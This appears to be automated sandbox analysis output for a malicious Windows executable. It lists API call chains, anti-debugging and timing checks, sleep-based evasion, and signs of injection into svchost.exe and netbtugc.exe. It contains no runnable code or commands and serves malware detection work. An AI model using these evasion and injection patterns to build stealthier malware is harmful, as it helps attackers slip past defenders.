Code function: 0_2_00D233C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00D233C7

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9736

Jump to behavior

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-99442

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\directory\.exe	API coverage: 4.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7480	Thread sleep count: 236 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7480	Thread sleep time: -472000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7480	Thread sleep count: 9736 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7480	Thread sleep time: -19472000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe TID: 7652	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe TID: 7652	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe TID: 7652	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe TID: 7652	Thread sleep count: 48 > 30	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe TID: 7652	Thread sleep time: -48000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\directory\.exe	API/Special instruction interceptor: Address: 20C3234
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D64696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00D64696
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00D6C9C7
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6C93C FindFirstFileW,FindClose,	0_2_00D6C93C
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D6F200
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D6F35D
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00D6F65E
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D63A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00D63A2B
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D63D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00D63D4E
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00D6BF27
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B94696 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00B94696
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_00B9C9C7
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9C93C FindFirstFileW,FindClose,	1_2_00B9C93C
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00B9F200
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00B9F35D
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00B9F65E
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B93A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00B93A2B
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B93D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00B93D4E
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00B9BF27

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D04AFE

Source: netbtugc.exe, 00000004.00000002.4247312315.00000000032CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: fIuefTlcmxsHvlw.exe, 00000008.00000002.4247915414.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: firefox.exe, 00000009.00000002.2225759148.00000252DEF1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	API call chain: ExitProcess graph end node	graph_0-98843
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	API call chain: ExitProcess graph end node	graph_0-98414
Source: C:\Users\user\AppData\Local\directory\.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417823 LdrLoadDll,

2_2_00417823

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D741FD BlockInput,

0_2_00D741FD

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D03B4C

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D35CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00D35CCC

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D7C304 LoadLibraryA,GetProcAddress,

0_2_00D7C304

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00B434A0 mov eax, dword ptr fs:[00000030h]	0_2_00B434A0
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00B43500 mov eax, dword ptr fs:[00000030h]	0_2_00B43500
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00B41E50 mov eax, dword ptr fs:[00000030h]	0_2_00B41E50
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_020C34A0 mov eax, dword ptr fs:[00000030h]	1_2_020C34A0
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_020C3500 mov eax, dword ptr fs:[00000030h]	1_2_020C3500
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_020C1E50 mov eax, dword ptr fs:[00000030h]	1_2_020C1E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]	2_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]	2_2_0350634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]	2_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]	2_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]	2_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]	2_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]	2_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]	2_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]	2_2_0350625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]	2_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]	2_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]	2_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]	2_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]	2_2_035062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]	2_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]	2_2_03504164
